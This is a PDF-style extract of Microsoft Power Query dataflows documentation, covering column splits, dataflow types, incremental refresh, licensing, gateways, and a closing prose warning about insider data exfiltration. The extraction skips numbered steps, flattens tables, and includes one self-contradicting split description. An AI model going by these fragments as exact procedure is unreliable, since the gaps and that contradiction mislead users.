Account column and then select the option to split the column by positions. In Split
Column by Positions, apply the following configuration:
Positions: 0, 6
Split into: Rows
7 Note
This operation will first start creating a column from position 0 to position 6. There
will be another column should there be values with a length of 8 or more
characters in the current data preview contents.
The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.
Split columns by lowercase to uppercase
Article • 02/17/2023
In Power Query, you can split a column through different methods. If your data contains
CamelCased text or a similar pattern, then the column(s) selected can be split by every
instance of the last lowercase letter to the next uppercase letter easily.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of the last
lowercase letter to the next uppercase letter. In this case, it only splits into two columns.
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of the last uppercase letter to the next
lowercase letter.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of the last
uppercase letter to the next lowercase letter. In this case, it only splits into two columns.
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a digit followed by a non-digit.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of a digit
followed with a non-digit. In this case, it only splits it into two.
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a non-digit followed by a digit.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by non-digit to
digit.
This single column will split into multiple columns, given every instance of a digit
followed by a non-digit. In this case, it only splits into two columns.
Tip
Try out Dataflow Gen2 in Data Factory in Microsoft Fabric, an all-in-one analytics
solution for enterprises. Microsoft Fabric covers everything from data movement to
data science, real-time analytics, business intelligence, and reporting. Learn how to
start a new trial for free!
Benefits of dataflows
The following list highlights some of the benefits of using dataflows:
A dataflow decouples the data transformation layer from the modeling and
visualization layer in a Power BI solution.
The data transformation code can reside in a central location, a dataflow, rather
than be spread out among multiple artifacts.
A dataflow creator only needs Power Query skills. In an environment with multiple
creators, the dataflow creator can be part of a team that together builds the entire
BI solution or operational application.
A dataflow is product-agnostic. It's not a component of Power BI only; you can get
its data in other tools and services.
Next steps
The following articles provide further study materials for dataflows.
Dataflows are used to extract, transform, and load data to a storage destination where it
can be leveraged for different scenarios. Because not all storage destinations share the
same characteristics, some dataflow features and behaviors differ depending on the
storage destination the dataflow loads data into. Before you create a dataflow, it's
important to understand how the data is going to be used, and choose the storage
destination according to the requirements of your solution.
Standard dataflows
A standard dataflow loads data to Dataverse tables. Standard dataflows can only be
created in Power Apps. One benefit of creating this type of dataflow is that any
application that depends on data in Dataverse can work with the data created by
standard dataflows. Typical applications that leverage Dataverse tables are Power Apps,
Power Automate, AI Builder and Power Virtual Agents.
Standard dataflows versions
We've been working on significant updates to standard dataflows to improve their
performance and reliability. These improvements will eventually be available to all
standard dataflows. But in the interim, we'll differentiate between existing standard
dataflows (version 1) and new standard dataflows (version 2) by adding a version
indicator in Power Apps.
Standard dataflow versions feature comparison
The following table lists the major features differences between standard dataflows V1
and V2, and provides information about each feature's behavior in each version.
Analytical dataflows
An analytical dataflow loads data to storage types optimized for analytics—Azure Data
Lake Storage. Microsoft Power Platform environments and Power BI workspaces provide
customers with a managed analytical storage location that's bundled with those product
licenses. In addition, customers can link their organization’s Azure Data Lake storage
account as a destination for dataflows.
Analytical dataflows are capable additional analytical features. For example, integration
with Power BI’s AI features or use of computed entities which will be discussed later.
You can create analytical dataflows in Power BI. By default, they'll load data to Power BI’s
managed storage. But you can also configure Power BI to store the data in the
organization’s Azure Data Lake Storage.
You can also create analytical dataflows in Power Apps and Dynamics 365 customer
insights portals. When you're creating a dataflow in Power Apps portal, you can choose
between Dataverse managed analytical storage or in your organization’s Azure Data
Lake Storage account.
AI Integration
Sometimes, depending on the requirement, you might need to apply some AI and
machine learning functions on the data through the dataflow. These functionalities are
available in Power BI dataflows and require a Premium workspace.
Note that the features listed above are Power BI specific and are not available when
creating a dataflow in the Power Apps or Dynamics 365 customer insights portals.
Computed tables
One of the reasons to use a computed table is the ability to process large amounts of
data. The computed table helps in those scenarios. If you have an table in a dataflow,
and another table in the same dataflow uses the first table's output, this action creates a
computed table.
The computed table helps with the performance of the data transformations. Instead of
re-doing the transformations needed in the first table multiple times, the transformation
is done only once in the computed table. Then the result is used multiple times in other
tables.
AI functions No Yes
AI features—analytical dataflow
If you're planning to use any AI functionality through the data transformation stage,
you'll find it helpful to use an analytical dataflow because you can use all the supported
AI features with this type of dataflow.
Create and use dataflows in Microsoft
Power Platform
Article • 04/06/2023
Using dataflows with Microsoft Power Platform makes data preparation easier, and lets
you reuse your data preparation work in subsequent reports, apps, and models.
In the world of ever-expanding data, data preparation can be difficult and expensive,
consuming as much as 60 to 80 percent of the time and cost for a typical analytics
project. Such projects can require wrangling fragmented and incomplete data, complex
system integration, data with structural inconsistency, and a high skillset barrier.
To make data preparation easier and to help you get more value out of your data, Power
Query and Power Platform dataflows were created.
With dataflows, Microsoft brings the self-service data preparation capabilities of Power
Query into the Power BI and Power Apps online services, and expands existing
capabilities in the following ways:
Self-service data prep for big data with dataflows: Dataflows can be used to
easily ingest, cleanse, transform, integrate, enrich, and schematize data from a
large and ever-growing array of transactional and observational sources,
encompassing all data preparation logic. Previously, extract, transform, load (ETL)
logic could only be included within datasets in Power BI, copied over and over
between datasets, and bound to dataset management settings.
With dataflows, ETL logic is elevated to a first-class artifact within Microsoft Power
Platform services, and includes dedicated authoring and management experiences.
Business analysts, BI professionals, and data scientists can use dataflows to handle
the most complex data preparation challenges and build on each other's work,
thanks to a revolutionary model-driven calculation engine, which takes care of all
the transformation and dependency logic—cutting time, cost, and expertise to a
fraction of what's traditionally been required for those tasks. You can create
dataflows by using the well-known, self-service data preparation experience of
Power Query. Dataflows are created and easily managed in app workspaces or
environments, in Power BI or Power Apps, respectively, enjoying all the capabilities
these services have to offer, such as permission management and scheduled
refreshes.
Load data to Dataverse or Azure Data Lake Storage: Depending on your use case,
you can store data prepared by Power Platform dataflows in the Dataverse or your
organization's Azure Data Lake Storage account:
Dataverse lets you securely store and manage data that's used by business
applications. Data within Dataverse is stored in a set of tables. A table is a set of
rows (formerly referred to as records) and columns (formerly referred to as
fields/attributes). Each column in the table is designed to store a certain type of
data, for example, name, age, salary, and so on. Dataverse includes a base set of
standard tables that cover typical scenarios, but you can also create custom
tables specific to your organization and populate them with data by using
dataflows. App makers can then use Power Apps and Power Automate to build
rich applications that use this data.
Azure Data Lake Storage lets you collaborate with people in your organization
using Power BI, Azure Data, and AI services, or using custom-built Line of
Business Applications that read data from the lake. Dataflows that load data to
an Azure Data Lake Storage account store data in Common Data Model folders.
Common Data Model folders contain schematized data and metadata in a
standardized format, to facilitate data exchange and to enable full
interoperability across services that produce or consume data stored in an
organization’s Azure Data Lake Storage account as the shared storage layer.
Advanced Analytics and AI with Azure: Power Platform dataflows store data in
Dataverse or Azure Data Lake Storage—which means that data ingested through
dataflows is now available to data engineers and data scientists to leverage the full
power of Azure Data Services, such as Azure Machine Learning, Azure Databricks,
and Azure Synapse Analytics for advanced analytics and AI. This enables business
analysts, data engineers, and data scientists to collaborate on the same data within
their organization.
Support for Common Data Model: Common Data Model is a set of a standardized
data schemas and a metadata system to allow consistency of data and its meaning
across applications and business processes. Dataflows support Common Data
Model by offering easy mapping from any data in any shape into the standard
Common Data Model entities, such as Account and Contact. Dataflows also land
the data, both standard and custom entities, in schematized Common Data Model
form. Business analysts can take advantage of the standard schema and its
semantic consistency, or customize their entities based on their unique needs.
Common Data Model continues to evolve as part of the Open Data Initiative .
Dataflows Data Connector in Power For dataflows with Azure Data Lake Storage Yes
BI Desktop as the destination
Dataflow linked entities For dataflows with Azure Data Lake Storage Yes
as the destination
Computed Entities (in-storage For dataflows with Azure Data Lake Storage Power BI
transformations using M) as the destination Premium
only
Dataflow incremental refresh For dataflows with Azure Data Lake Storage Power BI
as the destination, requires Power Apps Premium
Plan2 only
Known limitations
Copying dataflows as part of a Power Platform environments copy operation is not
supported.
Next steps
More information about dataflows in Power Apps:
The following articles go into more detail about common usage scenarios for dataflows.
For more information about Common Data Model and the Common Data Model folder
standard, read the following articles:
Microsoft Dataverse for Teams delivers a built-in, low-code data platform for Microsoft
Teams. It provides relational data storage, rich data types, enterprise-grade governance,
and one-click solution deployment. Dataverse for Teams enables everyone to easily
build and deploy apps.
Before today, the way to get data into Dataverse for Teams was by manually adding data
directly into a table. This process can be prone to errors and isn't scalable. But now, with
self-service data prep you can find, clean, shape, and import your data into Dataverse
for Teams.
With your organizational data already sitting in a different location, you can use Power
Query dataflows to directly access your data through the connectors and load the data
into Dataverse for Teams. When you update in your organizational data, you can refresh
your dataflows by just one click and the data in Dataverse for Teams is updated too. You
can also use the Power Query data transformations to easily validate and clean your
data and enforce data quality for your Apps.
Dataflows were introduced to help organizations retrieve data from disparate sources
and prepare it for consumption. You can easily create dataflows using the familiar, self-
service Power Query experience to ingest, transform, integrate, and enrich data. When
creating a dataflow, you'll connect to data, transform the data, and load data into
Dataverse for Teams tables. Once the dataflow is created, it begins the process of
importing data into the Dataverse table. Then you can start building apps to leverage
that data.
1. Sign in to Teams web version , and then select the link for Power Apps.
6. In Navigator, select the tables that are present in your Excel file. If your Excel file
has multiple sheets and tables, select only the tables you're interested in. When
you're done, select Transform data.
7. Clean and transform your data using Power Query. You can use the out-of-the box
transformations to delete missing values, delete unnecessary columns, or to filter
your data. With Power Query, you can apply more than 300 different
transformations on your data. To learn more about Power Query transformations,
see Use Power Query to transform data. After you're finished with preparing your
data, select Next.
8. In Map tables, select Load to new table to create a new table in Dataverse for
Teams. You can also choose to load your data into an existing table. In the Map
tables screen, you can also specify a Unique primary name column and an
Alternate key column (optional). In this example, leave these selections with the
default values. To learn more about mapping your data and the different settings,
see Field mapping considerations for standard dataflows.
9. Select Create to finish your dataflow. Once you’ve created your dataflow, data
begins loading into Dataverse for Teams. This process can take some time and you
can use the management page to check the status. When a dataflow completes a
run, its data is available to use.
In the Last Refresh column, you can see when your data was last refreshed. If your
refresh failed, an error indication appears. If you select the error indication, the details of
the error and recommended steps to address it appear.
In the Status column, you can see the current status of the dataflow. Possible states are:
Refresh in progress: the dataflow is extracting, transforming, and loading your
data from the source to the Dataverse Tables. This process can take several
minutes depending on the complexity of transformations and data source's
performance. We recommend that you check the status of the dataflow frequently.
To navigate to the action bar, select the three dots “…” next to your dataflow.
Edit your dataflow if you want to change your transformation logic or mapping.
Rename your dataflow. At creation, an autogenerated name is assigned.
Refresh your dataflow. When you refresh your dataflows, the data will be updated.
Delete your dataflow.
Show refresh history. This gives you the results from the last refresh.
Select Show refresh history to see information about the last refresh of your dataflow.
When the dataflow refresh is successful, you can see how many rows were added or
updated in Dataverse. When your dataflow refresh wasn't successful, you can investigate
why with the help of the error message.
7 Note
The following table lists the major feature differences between dataflows for Dataverse
in Teams and dataflows for Dataverse.
1
Although there's no limitation on the amount of data you can load into Dataverse for
Teams, for better performance in loading larger amounts of data, we recommend a
Dataverse environment.
Consume data from dataflows
Article • 08/04/2023
The ways you can consume data from Microsoft dataflows depends on several factors,
like storage and type of dataflow. In this article, you learn how to choose the right
dataflow for your needs.
Type of dataflow
There are multiple types of dataflows available for you to create. You can choose
between a Power BI dataflow, standard dataflow, or an analytical dataflow. To learn more
about the differences and how to select the right type based on your needs, go to
Understanding the differences between dataflow types.
Storage type
A dataflow can write to multiple output destination types. In short, you should be using
the Dataflows connector unless your destination is a Dataverse table. Then you use the
Dataverse/CDS connector.
When you've connected your data lake, you should still use the Dataflows connector. If
this connector doesn't meet your needs, you could consider using the Azure Data Lake
connector instead.
Dataverse
A standard dataflow writes the output data to a Dataverse table. Dataverse lets you
securely store and manage data that's used by business applications. After you load
data in the Dataverse table, you can consume the data using the Dataverse connector.
Dataflows can get data from other dataflows
If you'd like to reuse data created by one dataflow in another dataflow, you can do so by
using the Dataflow connector in the Power Query editor when you create the new
dataflow.
When you get data from the output of another dataflow, a linked table is created.
Linked tables provide a way to make data created in an upstream dataflow available in a
downstream dataflow, without copying the data to the downstream dataflow. Because
linked tables are just pointers to tables created in other dataflows, they're kept up to
date by the refresh logic of the upstream dataflow. If both dataflows reside in the same
workspace or environment, those dataflows are refreshed together, to keep data in both
dataflows always up to date. More information: Link tables between dataflows
You're probably using a Dataverse table as the destination for your standard dataflow.
Use the Dataverse/CDS connector instead or consider switching to an analytical
dataflow.
There's a difference in the data when I remove duplicates in dataflows—how can I
resolve this?
Next Steps
The following articles provide more details about related articles.
When you include your dataflows in a solution, their definitions become portable,
making it easier to move them from one environment to another, saving time required
to author the dataflow.
A typical use case is for an independent software vendor (ISV) to develop a solution
containing a dataflow, that extracts and transforms data from a data source to Dataverse
tables, in a sandbox environment. The ISV would then move that dataflow and
destination tables to a test environment to test with their test data source to validate
that the solution works well and is ready for production. After testing completes, the ISV
would provide the dataflow and tables to clients who will import them into their
production environment to operate on client’s data. This process is much easier when
you add both the dataflows and tables they load data to into solutions, and then move
the solutions and their contents between environments.
Dataflows added to a solution are known as solution-aware dataflows. You can add
multiple dataflows to a single solution.
7 Note
Prerequisites
You need to have created a solution before you can add a dataflow to it. More
information: Create solutions
You need to be the owner of at least one dataflow in the environment. More
information: Create dataflows
Add the dataflow
1. Sign in to Power Apps .
3. Select the solution you'll add your dataflow to, and from the context menu select
Edit.
5. Optional: If your dataflow loads data into a custom Dataverse table, add the
custom table to the solution as well.
In this example, the dataflow you added to the solution loads data into a custom
table called Full Order Details, which you want to also include in the solution with
the dataflow.
Once both the dataflow and table it loads data to are added to the solution, it has
the two artifacts added to the solution. In this case, the artifacts are
cr0c8_FullOrderDetails and Import Sales Data.
To save your work, be sure to publish all customizations. Now, the solution is ready
for you to export from the source environment and import to the destination
environment.
1. On the left navigation pane, select the down arrow next to Dataverse and select
Dataflows. Identify the dataflow that was imported, and select Edit from the
context menu.
2. In the Dataflow list, locate and double-click the dataflow that was added as part of
the solution you’ve imported.
Once the credentials for the connection have been updated, all queries that use
that connection automatically load.
4. If your dataflow loads data in Dataverse tables, select Next to review the mapping
configuration.
5. The mapping configuration is also saved as part of the solution. Since you also
added the destination table to the solutions, there's no need to recreate the table
in this environment and you can publish the dataflow.
That's it. Your dataflow now refreshes and loads data to the destination table.
Known limitations
Dataflows can't be created from within solutions. To add a dataflow to a solution,
follow the steps outlined in this article.
Dataflows can't be edited directly from within solutions. Instead, the dataflow must
be edited in the dataflows experience.
Dataflows can't use connection references for any connector.
Environment variables can't be used by dataflows.
Dataflows don't support adding required components, such as custom tables they
load data to. Instead, the custom table should be manually added to the solution.
Dataflows can't be deployed by application users (service principals).
Incremental refresh configuration isnt supported when deploying solutions. After
deployment of the dataflow via solution, the incremental refresh configuration
should be reapplied.
Linked tables to other dataflows aren't supported when deploying solutions. After
deployment of the dataflow via solution, please edit the dataflow and edit the
connection to the linked dataflow.
Using incremental refresh with
dataflows
Article • 08/04/2023
With dataflows, you can bring large amounts of data into Power BI or your
organization's provided storage. In some cases, however, it's not practical to update a
full copy of source data in each refresh. A good alternative is incremental refresh, which
provides the following benefits for dataflows:
Refresh occurs faster: Only data that's changed needs to be refreshed. For
example, refresh only the last five days of a 10-year dataflow.
Refresh is more reliable: For example, it's not necessary to maintain long-running
connections to volatile source systems.
Resource consumption is reduced: Less data to refresh reduces overall
consumption of memory and other resources.
7 Note
When the schema for a table in an analytical dataflow changes, a full refresh takes
place to ensure that all the resulting data matches the new schema. As a result, any
data stored incrementally is refreshed and in some cases, if the source system
doesn't retain historic data, is lost.
Using incremental refresh in dataflows created in Power BI requires that the dataflow
reside in a workspace in Premium capacity. Incremental refresh in Power Apps requires
Power Apps per-app or per-user plans, and is only available for dataflows with Azure
Data Lake Storage as the destination.
In either Power BI or Power Apps, using incremental refresh requires that source data
ingested into the dataflow have a DateTime field on which incremental refresh can filter.
When you select the icon, the Incremental refresh settings window appears. Turn on
incremental refresh.
The following list explains the settings in the Incremental refresh settings window.
Incremental refresh on/off toggle: Turns the incremental refresh policy on or off
for the table.
Filter field drop-down: Selects the query field on which the table should be filtered
for increments. This field only contains DateTime fields. You can't use incremental
refresh if your table doesn't contain a DateTime field.
Store/refresh rows from the past: The example in the previous image illustrates
these next few settings.
In this example, we define a refresh policy to store five years of data in total and
incrementally refresh 10 days of data. Assuming that the table is refreshed daily,
the following actions are carried out for each refresh operation:
Remove calendar years that are older than five years before the current date.
For example, if the current date is January 1, 2019, the year 2013 is removed.
The first dataflow refresh might take a while to import all five years, but
subsequent refreshes are likely to be completed much more quickly.
Tip
The current design requires that the column used to detect data changes be
persisted and cached into memory. You might want to consider one of the
following techniques to reduce cardinality and memory consumption:
Persist only the maximum value of this column at time of refresh, perhaps
by using a Power Query function.
Reduce the precision to a level that's acceptable given your refresh-
frequency requirements.
Only refresh complete periods: Imagine that your refresh is scheduled to run at
4:00 AM every day. If data appears in the source system during those first four
hours of that day, you might not want to account for it. Some business metrics,
such as barrels per day in the oil and gas industry, aren't practical or sensible to
account for based on partial days.
After incremental refresh is configured, the dataflow automatically alters your query to
include filtering by date. If the dataflow was created in Power BI, you can also edit the
automatically generated query by using the advanced editor in Power Query to fine-
tune or customize your refresh. Read more about incremental refresh and how it works
in the following sections.
Computed tables are based on queries running over a data store, which can be another
dataflow. As such, computed tables behave the same way as linked tables.
Because computed tables and linked tables behave similarly, the requirements and
configuration steps are the same for both. One difference is that for computed tables, in
certain configurations, incremental refresh can't run in an optimized fashion because of
the way partitions are built.
When moving a dataflow from full refresh to incremental, the new refresh logic updates
the dataflow by adhering to the refresh window and increment as defined in the
incremental refresh settings.
When moving a dataflow from incremental to full refresh, all data accumulated in the
incremental refresh is overwritten by the policy defined in the full refresh. You must
approve this action.
In the case where a scheduled refresh is defined in the system, incremental refresh
uses the time-zone settings from the scheduled refresh section. This ensures that
whatever time zone the person refreshing the dataflow is in, it will always be
consistent with the system's definition.
If no scheduled refresh is defined, dataflows use the time zone from the computer
of the user who's performing the refresh.
Incremental refresh can also be invoked by using APIs. In this case, the API call can hold
a time-zone setting that's used in the refresh. Using APIs can be helpful for testing and
validation purposes.
Merge partitions
In this example, day partitions are automatically merged to the month level after they
go outside the incremental range. Partitions in the incremental range need to be
maintained at daily granularity to allow only those days to be refreshed. The refresh
operation with Run Date 12/11/2016 merges the days in November, because they fall
outside the incremental range.
The next refresh operation, with Run Date 1/16/2017, takes the opportunity to merge
the days in December and the months in Q4 of 2016.
Both approaches work according to your specified definitions in the refresh settings.
More information: Incremental refresh in Power BI Premium
See also
This article described incremental refresh for dataflows. Here are some more articles that
might be useful:
For more information about Common Data Model, you can read its overview article:
With Microsoft Power BI and Power Platform dataflows, you can connect to many
different data sources to create new dataflows, or add new entities to an existing
dataflow.
This article describes how to create dataflows by using these data sources. For an
overview of how to create and use dataflows, go to Creating a dataflow for Power BI
service and Create and use dataflows in Power Apps.
Power BI service
1. Open a workspace.
2. Select New.
3. Select Dataflow from the drop-down menu.
4. Under Define new tables, select Add new tables.
All categories
File
Database
Power Platform
Azure
Online Services
Other
For a list of all of the supported data sources in Power Query, go to Connectors in Power
Query.
After the server URL or resource connection information is provided, enter the
credentials to use for access to the data. You may also need to enter the name of an on-
premises data gateway. Then select Next.
Power Query Online initiates and establishes the connection to the data source. It then
presents the available tables from that data source in the Navigator window.
You can select tables and data to load by selecting the check box next to each in the left
pane. To transform the data you've chosen, select Transform data from the bottom of
the Navigator window. A Power Query Online dialog box appears, where you can edit
queries and perform any other transformations you want to the selected data.
2. Open Power Query Editor in Power BI Desktop, right-click the relevant query, and
then select Advanced Editor, as shown in the following image. From there, you can
copy the M script that appears in the Advanced Editor window.
3. Open the Power BI dataflow, and then select Get data for a blank query.
4. Paste the copied query into the blank query for the dataflow.
Your script then connects to the data source you specified.
The following list shows which connectors you can currently use by copying and pasting
the M query into a blank query:
Next steps
This article showed which data sources you can connect to for dataflows. The following
articles go into more detail about common usage scenarios for dataflows:
For information about individual Power Query connectors, go to the connector reference
list of Power Query connectors, and select the connector you want to learn more about.
Additional information about dataflows and related information can be found in the
following articles:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
Dataflows can be created in different portals, such as Power BI and the Power Apps, and
can be of either analytical or standard type. In addition, some dataflow features are only
available as Premium features. Considering the wide range of products that can use
dataflows, and feature availability in each product or dataflow type, it's important to
know what licensing options you need to use dataflows.
If you want to create analytical dataflows that store data in your organization's Azure
Data Lake Storage Gen2 account, you or your administrator need access to an Azure
subscription and an Azure Data Lake Storage Gen2 account.
Premium features
Some of the dataflow features are limited to premium licenses. If you want to use the
enhanced compute engine to speed up your dataflow queries' performance over
computed tables, or have the DirectQuery connection option to the dataflow, you need
to have Power BI P1 or A3 or higher capacities.
AI capabilities in Power BI, linked table, and computed table are all premium functions
that aren't available with a Power BI Pro account.
List of features
The following table contains a list of features and the license needed for them to be
available.
Store data in Dataverse tables (standard dataflow) N/A Per app plan
Per user plan
Store data in Azure Data Lake Storage (analytical Yes Yes, using analytical
dataflow) dataflows
Store data in customer provided Azure Data Lake Yes Per app plan
Storage (analytical dataflow; bring your own Azure Per user plan
Data Lake Storage)
The Power Apps per-app plan covers up to a 50-MB database capacity. The Power Apps
per-user plan allows you to have a database of 250-MB capacity.
Power BI Pro
Power BI Pro gives you the ability to create analytical dataflows, but not use any of the
premium features. With a Power BI Pro account, you can't use linked or computed
tables, you can't use AI capabilities in Power BI, and you can't use DirectQuery to
connect to the dataflow. The storage for your dataflows is limited to the space left under
your Power BI Pro account, which is a subset of 10-GB storage for all Power BI content.
Currently, we don't report the current storage usage of dataflows in the Power BI portal.
You'll be notified if you've almost reached the limit of the left over capacity.
Power BI Premium
If you use Power BI Premium (capacity-based licensing), you can use all the AI
capabilities in Power BI, computed tables and linked tables, with the ability to have a
DirectQuery connection to the dataflow. You can also use the enhanced compute
engine. However, the dataflow created under a premium capacity license uses only the
internal Azure Data Lake Storage, and isn't accessible by other platforms except Power
BI itself. You can't create external dataflows just by having a Power BI Premium license;
you need to have an Azure subscription for Azure Data Lake Storage as well.
Dataflows that are using a premium capacity to refresh the data are limited to the
maximum number of parallel tasks they can perform at a given time. The maximum
number of parallel tasks depends on the type of premium capacity you're using. This
table represents the maximum number of parallel tasks that can be run at a given time
by all dataflows in a workspace mapped to the capacity.
Parallel tasks
A premium capacity can run multiple evaluations in parallel. For example, you have a P4
capacity and a dataflow that consists of 84 tasks. You refresh your dataflow and the first
64 tasks are allocated for the refresh. The 20 left over evaluations for this dataflow are
parked in a queue. Once one of the evaluations is finished, it starts with the next
evaluation from the queue. If you start another dataflow in your workspace on the same
premium capacity while the other is still running, it gets parked in the same queue of
the premium capacity and needs to wait on the other dataflows in the workspace to
start the refresh of your data.
You can use the following pointers to estimate the number of tasks of your dataflow
refresh:
The number of queries executed in the refresh (don't forget the upstream linked
tables).
The number of partitions in an incremental refresh query are considered as extra
tasks.
To lower the number of tasks or improve the efficiency of your tasks, you can use the
following strategies:
Lower the number of queries in your dataflow by combining queries where
possible and only "enable load" for queries that are used downstream.
Evaluate if you really need the upstream linked tables to refresh automatically.
Strategically schedule your dataflow refreshes based on the number of tasks.
Make sure your query returns the minimum set of columns and rows to satisfy
your data need. The faster and more efficiently the task executes, the sooner the
next task can start.
Next step
If you want to read more details about the concepts discussed in this article, go to any
of the following links.
Pricing
Power BI pricing
Power Apps pricing
Azure Data Lake Storage Gen 2 pricing
Features
Computed tables
Linked tables
AI capabilities in Power BI dataflows
Standard vs. analytical dataflows
The enhanced compute engine
How to migrate queries from Power
Query in the desktop (Power BI and
Excel) to dataflows
Article • 02/17/2023
If you already have queries in Power Query, either in Power BI Desktop or in Excel, you
might want to migrate the queries into dataflows. The migration process is simple and
straightforward. In this article, you'll learn the steps to do so.
To learn how to create a dataflow in Microsoft Power Platform, go to Create and use
dataflows in Power Platform. To learn how to create a dataflow in Power BI, go to
Creating and using dataflows in Power BI.
In Excel on the Data tab, select Get Data> Launch Power Query Editor.
2. Copy the queries:
If you've organized your queries into folders (called groups in Power Query):
a. In the Queries pane, select Ctrl as you select the folders you want to migrate to
the dataflow.
b. Select Ctrl+C.
If you don't have folders:
a. In the Queries pane, select Ctrl as you select the queries you want to migrate.
b. Select Ctrl+C.
3. Paste the copied queries into a dataflow:
b. Open the dataflow in Power Query Editor, and in the Queries pane, select
Ctrl+V to paste the copied folders or queries.
The image below shows an example of successfully copied folders.
If your data source is an on-premises source, you need to perform an extra step.
Examples of on-premises sources can be Excel files in a shared folder in a local
domain, or a SQL Server database hosted in an on-premises server.
The gateway isn't needed for data sources residing in the cloud, such as an Azure
SQL database.
If you've done all the steps successfully, you'll see a preview of the data in the
Power Query Editor.
Install an on-premises data gateway to transfer data quickly and securely between a
Power Platform dataflow and a data source that isn't in the cloud, such as an on-
premises SQL Server database or an on-premises SharePoint site. You can view all
gateways for which you have administrative permissions and manage permissions and
connections for those gateways.
Prerequisites
Power BI service
A Power BI service account. Don't have one? Sign up for 60 days free.
Power Apps
A Power Apps account. Don't have one? Sign up for 30 days free.
Install a gateway
You can install an on-premises data gateway directly from the online service.
7 Note
It's a good general practice to make sure you're using a supported version of
the on-premises data gateway. We release a new update of the on-premises
data gateway every month. Currently, Microsoft actively supports only the last
six releases of the on-premises data gateway.
Starting April 2022, the minimum required gateway version will be Feburary
2021. Dataflows that refresh using an earlier version of the gateway might
stop refreshing.
1. Select the downloads button in the upper right corner of Power BI service, and
choose Data Gateway.
2. Install the gateway using the instructions provided in Install an on-premises data
gateway.
4. Install the gateway using the instructions provided in Install an on-premises data
gateway.
3. Provide the connection details for the enterprise gateway that will be used to
access the on-premises data. You must select the gateway itself, and provide
credentials for the selected gateway. Only gateways for which you're an
administrator appear in the list.
You can change the enterprise gateway used for a given dataflow and change the
gateway assigned to all of your queries using the dataflow authoring tool.
7 Note
The dataflow will try to find or create the required data sources using the new
gateway. If it can't do so, you won't be able to change the gateway until all needed
dataflows are available from the selected gateway.
1. If we detect that an existing data source is available for the selected gateway, the
Username and Password fields will be pre-populated.
a. If you select Next at this point, you're considered to be using that existing data
source, and so you only need to have permissions to that data source.
b. If you edit any of the credential fields and select Next, then you're considered to
be editing that existing data source, at which point you need to be an admin of
the gateway.
2. If we don't detect that an existing data source is available for the selected gateway,
the Username and Password fields will be blank, and if you edit the credential
fields and select Next, then you're considered to be creating a new data source on
the gateway, at which point you need to be an admin of the gateway.
If you only have data source user permission on the gateway, then 1.b and 2 can't be
achieved and the dataflow can't be created.
2. To add a user to a gateway, select Users, specify a user or group, and then specify
a permission level. Creating new data sources with a gateway in dataflows requires
Admin permission on the gateway. Admins have full control of the gateway,
including adding users, setting permissions, creating connections to all available
data sources, and deleting the gateway.
To view details and edit the settings, select Gateway Cluster Settings.
To add users as administrators of the gateway, select Administrators.
To add a data source to the gateway, select Add Data Source, enter a data
source name and choose the data source type under Data Source Settings,
and then enter the email address of the person who will use the data source.
To delete a gateway, select the ellipsis to the right of the gateway name and
then select Remove.
To view details, edit the settings, or delete a gateway, select Connections, and
then select a connection.
You can only share some types of connections, such as a SQL Server
connection. For more information, see Share canvas-app resources in
Power Apps.
Limitations
There are a few known limitations when using enterprise gateways and dataflows.
Dataflow refresh might fail if an out-of-date data gateway is used. Starting April
2022, the minimum required data gateway version is February 2021.
Each dataflow can use only one gateway. As such, all queries should be configured
using the same gateway.
If several gateways are needed, the best practice is to build several dataflows (one
for each gateway). Then use the compute or table reference capabilities to unify
the data.
Dataflows are only supported using enterprise gateways. Personal gateways won't
be available for selection in the drop-down lists and settings screens.
Creating new data sources with a gateway in dataflows is only supported for
people with Admins permissions.
Users with Can Use or Can Use + Share permissions can use existing connections
when creating dataflows.
Troubleshooting
When you attempt to use an on-premises data source to publish a dataflow, you might
come across the following MashupException error:
This error usually occurs because you're attempting to connect to an Azure Data Lake
Storage endpoint through a proxy, but you haven't properly configured the proxy
settings for the on-premises data gateway. To learn more about how to configure these
proxy settings, go to Configure proxy settings for the on-premises data gateway.
For more information about troubleshooting issues with gateways, or configuring the
gateway service for your network, go to the On-premises data gateway documentation.
If you're experiencing issues with the gateway version you're using, try updating to the
latest version as your issue might have been resolved in the latest version. For more
information about updating your gateway, go to Update an on-premises data gateway.
Next steps
Create and use dataflows in Power Apps
Fabric dataflows and Power Platform dataflows are Microsoft 365 services that enable
users to easily connect to, extract, move, and transform data across hundreds of
supported data sources. Dataflows build upon an underlying service called Power Query
Online, which hosts the data movement engine (Mashup Engine) as a cloud service. By
default, connectivity originates from this cloud location and has unrestricted access to
the internet. Therefore, when using dataflows to access and move sensitive data,
organizations should consider strategies to deter insiders from accidental or malicious
data exfiltration. This article outlines known risk factors and best practices for
safeguards.
Considerations
A trusted user who has access to sensitive data can author a program to push the data
to an untrusted data store. Since the Mashup Engine runs entirely in the cloud, it doesn't
go through corporate firewalls and proxy servers. So, it isn't subject to any data loss
prevention (DLP) policies that might be enforced by these networks. Since the point of
access is on the public internet, data can travel to any destination that the user has
access to—either through authentication or anonymous access. Here are some
examples of ways in which these programs can exfiltrate sensitive data:
Anonymous web requests: By using Web.Contents, users can make web requests
with sensitive data in the body of the request.
Cross data source filtering and joins: Sensitive data can be used as filtering or join
conditions against another untrusted data source. Specifically, data can travel to
the untrusted data source in the form of query strings or parameters.
Output destinations: By using Fabric dataflows, users can specify output
destinations for their queries, thereby transferring data to a list of supported data
sinks, which includes Azure SQL databases and data warehouses, Fabric
Lakehouses, Warehouses, and KQL databases.
Network isolation
We recommend that all data stores containing sensitive data be network isolated to
permit access only from selected networks. This isolation restriction must be defined
